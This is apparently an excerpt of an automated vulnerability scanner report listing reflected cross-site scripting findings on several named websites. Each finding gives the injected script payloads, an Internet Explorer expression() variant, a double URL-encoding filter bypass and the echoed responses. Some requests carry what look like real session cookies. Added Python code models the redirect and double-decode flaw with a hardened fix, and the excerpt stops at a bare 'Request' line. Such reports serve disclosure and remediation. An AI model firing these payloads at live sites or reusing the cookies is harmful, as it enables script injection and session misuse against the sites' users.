The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f52e6"><script>alert(1)</script>b84ec9d5f23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videosf52e6"><script>alert(1)</script>b84ec9d5f23/' HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f6b"><script>alert(1)</script>318850b51ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/'68f6b"><script>alert(1)</script>318850b51ea HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... <meta property="og:url" content="http://myspace.videosurf.com/videos/'68f6b"><script>alert(1)</script>318850b51ea"/> ...[SNIP]...
2.148. http://myspace.videosurf.com/videos/' [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://myspace.videosurf.com
Path:
/videos/'
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f540"><script>alert(1)</script>1833c6fd0c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/'?2f540"><script>alert(1)</script>1833c6fd0c5=1 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a42"><script>alert(1)</script>e44f5d0946f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon91a42"><script>alert(1)</script>e44f5d0946f/people_search/myspace HTTP/1.1 Host: network.videosurf.com Proxy-Connection: keep-alive Referer: http://www.myspace.com/search/people?q='&ac=t Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72933"><script>alert(1)</script>da10c2a3e86 was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /AW-WP-LS4ES.html?sc=WP-LS4ES-GS1U72933"><script>alert(1)</script>da10c2a3e86&_kk=intranet%20search&_kt=ed18f41f-c691-4861-bd74-c8fab6a6d457/x22 HTTP/1.1 Host: programs.lucidimagination.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Set-Cookie: ARPT=LWYXXLSGw2CYLQ; path=/ Date: Sat, 11 Dec 2010 18:15:35 GMT Server: Apache Content-Length: 27011 Vary: *,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l ...[SNIP]... <input class='mktFormHidden' name="Web_Source_Type__c" id="Web_Source_Type__c" type='hidden' value="WP-LS4ES-GS1U72933"><script>alert(1)</script>da10c2a3e86" /> ...[SNIP]...
The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f77b"><script>alert(1)</script>dd903c9789a was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /AW-WP-Starting.html?sc=WP-START-GS1U7f77b"><script>alert(1)</script>dd903c9789a&_kk=intranet%20search%20engine&_kt=21825d11-df4f-47a4-b659-cc8be4a11a7b/x22 HTTP/1.1 Host: programs.lucidimagination.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Set-Cookie: ARPT=LWYXXLSGw1CYLO; path=/ Date: Sat, 11 Dec 2010 18:15:35 GMT Server: Apache Content-Length: 27222 Vary: *,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l ...[SNIP]... <input class='mktFormHidden' name="Web_Source_Type__c" id="Web_Source_Type__c" type='hidden' value="WP-START-GS1U7f77b"><script>alert(1)</script>dd903c9789a" /> ...[SNIP]...
2.152. https://secure.shareit.com/shareit/cart.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://secure.shareit.com
Path:
/shareit/cart.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5729f"style%3d"x%3aexpression(alert(1))"ed5840556f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5729f"style="x:expression(alert(1))"ed5840556f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /shareit/cart.html?productid=300057806&currencies=USD&js=0&5729f"style%3d"x%3aexpression(alert(1))"ed5840556f1=1 HTTP/1.1 Host: secure.shareit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:17:24 GMT Server: Apache P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48235
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>share*it! - A service of Digital River (DEF03)</title> <style type=" ...[SNIP]... <form action="/shareit/cart.html?currencies=USD&js=0&5729f"style="x:expression(alert(1))"ed5840556f1=1&sessionid=1800044594&random=73ee187dc9960f099e807ed1d9f39120&sessionid=1800044594&random=73ee187dc9960f099e807ed1d9f39120" method="post"> ...[SNIP]...
2.153. https://secure.shareit.com/shareit/product.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://secure.shareit.com
Path:
/shareit/product.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d392f"style%3d"x%3aexpression(alert(1))"3005d8d59cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d392f"style="x:expression(alert(1))"3005d8d59cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /shareit/product.html?sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662&productid=300057806&d392f"style%3d"x%3aexpression(alert(1))"3005d8d59cb=1 HTTP/1.1 Host: secure.shareit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:17:12 GMT Server: Apache P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41502
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>share*it! - A service of Digital River (DEF03) - Bean Software Searc ...[SNIP]... <form action="/shareit/product.html?productid=300057806&d392f"style="x:expression(alert(1))"3005d8d59cb=1&sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662&sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662" method="post"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75281%2522%253e%253ca%253ebc4fa03f4e7 was submitted in the REST URL parameter 1. This input was echoed as 75281"><a>bc4fa03f4e7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us75281%2522%253e%253ca%253ebc4fa03f4e7/library/aa991542.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:21 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us75281"><a>bc4fa03f4e7/library/aa991542" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bf0f%2522%253e%253ca%253e84fddc32f18 was submitted in the REST URL parameter 2. This input was echoed as 9bf0f"><a>84fddc32f18 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9bf0f%2522%253e%253ca%253e84fddc32f18/aa991542.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:28 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9bf0f"><a>84fddc32f18/aa991542" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6463%2522%253e%253ca%253efc79662f9f2 was submitted in the REST URL parameter 3. This input was echoed as e6463"><a>fc79662f9f2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/aa991542.aspxe6463%2522%253e%253ca%253efc79662f9f2 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:35 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa991542.aspxe6463"><a>fc79662f9f2" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46021%2522%253e%253ca%253eead3e3d9a48 was submitted in the REST URL parameter 1. This input was echoed as 46021"><a>ead3e3d9a48 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
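The redirect hop is easy to miss when reproducing this finding: the first response is only a 302, and the reflection sits in the page the browser lands on afterwards. The following Python harness is an added example, not code from the report or from the application. It starts a local stand-in for the observed behaviour (the bounce to Message-Error.htm.htm and the un-encoded reflection of aspxerrorpath are modelled on the responses in this report; the class and function names, the 127.0.0.1 listener and the exact page markup are assumptions) and issues the same request with and without following the redirect.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, unquote, urlsplit
from urllib.request import HTTPRedirectHandler, build_opener

# Request path taken from the report (REST URL parameter 1 carries the payload).
PAYLOAD_PATH = '/en-us46021%2522%253e%253ca%253eead3e3d9a48/library/bb625087.aspx'
CANARY = '"><a>'          # the tag-breaking fragment the payload decodes to
ERROR_PAGE = '/en-us/Message-Error.htm.htm'


class MockTechNet(BaseHTTPRequestHandler):
    """Assumed stand-in for the observed server behaviour; not the real site."""

    def do_GET(self):
        url = urlsplit(self.path)
        if url.path == ERROR_PAGE:
            # parse_qs percent-decodes the query string: this is the second
            # decode, and the decoded value is reflected into the attribute raw.
            failing = parse_qs(url.query).get('aspxerrorpath', [''])[0]
            body = ('<input type="hidden" name="fromPage" value="http://technet.microsoft.com'
                    f'{ERROR_PAGE}?aspxerrorpath={failing}" />').encode()
            self.send_response(200)
            self.send_header('Content-Type', 'text/html; charset=utf-8')
            self.send_header('Content-Length', str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        # Any other path: decode it once (what the web server does) and bounce
        # to the error page. %2522 has become %22, still harmless inside a URL.
        self.send_response(302)
        self.send_header('Location', f'{ERROR_PAGE}?aspxerrorpath={unquote(url.path)}')
        self.send_header('Content-Length', '0')
        self.end_headers()

    def log_message(self, *args):      # keep the demo quiet
        pass


class NoRedirect(HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None                    # surface the 3xx instead of following it


def start_server():
    """Bind an ephemeral loopback port and serve in a background thread."""
    server = ThreadingHTTPServer(('127.0.0.1', 0), MockTechNet)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch(port, path, follow):
    """Return (status, body) for the request, following redirects or not."""
    opener = build_opener() if follow else build_opener(NoRedirect)
    try:
        with opener.open(f'http://127.0.0.1:{port}{path}') as resp:
            return resp.status, resp.read().decode()
    except HTTPError as err:
        return err.code, err.read().decode()


def reflection_confirmed(port, path, follow=True):
    """True only when the final response is 200 and carries the raw canary."""
    status, body = fetch(port, path, follow)
    return status == 200 and CANARY in body


if __name__ == '__main__':
    server = start_server()
    port = server.server_address[1]
    print('without following the redirect:', fetch(port, PAYLOAD_PATH, follow=False))
    print('following the redirect:', fetch(port, PAYLOAD_PATH, follow=True))
    print('reflection confirmed:', reflection_confirmed(port, PAYLOAD_PATH))
    server.shutdown()
```

A checker that stops at the first response reports nothing, which is why a scanner (or a manual retest with curl) must follow the Location header before searching the body for the echoed fragment.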
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
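To make the double-encoding bypass and the remediation advice concrete, here is an added Python model of the two decode orders; it is not code from the report or from the application. The blocked-character set, the function names and the exact shape of the error page are assumptions based on the description and response above, and the payload is the one from this finding.

```python
import html
import re
from urllib.parse import unquote

# Payload from the report: the fragment  "><a>  percent-encoded twice
# (%2522 %253e %253ca %253e), wrapped in the scanner's two random markers.
PAYLOAD = '46021%2522%253e%253ca%253eead3e3d9a48'

# Assumed filter: the report only says the application "attempts to block
# certain characters"; the real list is not known.
BLOCKED = re.compile(r'[<>"\'\x00-\x1f]')


def web_server_decode(raw_path):
    """The single percent-decode the web server performs before the
    application sees the path. %2522 becomes %22, which is not yet a quote."""
    return unquote(raw_path)


def passes_filter(value):
    return BLOCKED.search(value) is None


def build_error_page(failing_path):
    """Reflection sink modelled on the report's response: the failing path is
    interpolated into a double-quoted attribute of a hidden input."""
    return ('<input type="hidden" name="fromPage" value="http://technet.microsoft.com'
            f'/en-us/Message-Error.htm.htm?aspxerrorpath={failing_path}" />')


def vulnerable_flow(raw_path):
    """Validate first, decode a second time afterwards, reflect without encoding.
    The filter inspects 46021%22%3e%3ca%3e... and sees nothing dangerous; the
    second unquote then produces the quote and the angle brackets."""
    once = web_server_decode(raw_path)
    if not passes_filter(once):
        raise ValueError('rejected by filter')
    twice = unquote(once)                # the custom second decode
    return build_error_page(twice)


def hardened_flow(raw_path, second_decode=False):
    """Canonicalise to the form the sink will use, validate that form, then
    encode for the HTML attribute context on output. Dropping the second
    decode (second_decode=False) is the preferred fix; if it is genuinely
    needed it must run before validation, never after."""
    canonical = web_server_decode(raw_path)
    if second_decode:
        canonical = unquote(canonical)
    if not passes_filter(canonical):
        raise ValueError('rejected by filter')
    return build_error_page(html.escape(canonical, quote=True))


def attribute_is_broken(page):
    """True when the reflected value closes the attribute and opens a tag."""
    return '"><a>' in page


if __name__ == '__main__':
    page = vulnerable_flow(PAYLOAD)
    print('vulnerable flow:', page)
    print('attribute broken:', attribute_is_broken(page))
    for second in (False, True):
        try:
            page = hardened_flow(PAYLOAD, second_decode=second)
            print(f'hardened (second_decode={second}):', page, attribute_is_broken(page))
        except ValueError as err:
            print(f'hardened (second_decode={second}): {err}')
```

The output encoding step is deliberately kept even though the filter already rejects the payload: validation on the canonical form stops this bypass, but html.escape with quote=True is what keeps the attribute intact if a future decode step or a filter gap lets a quote through.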
Request
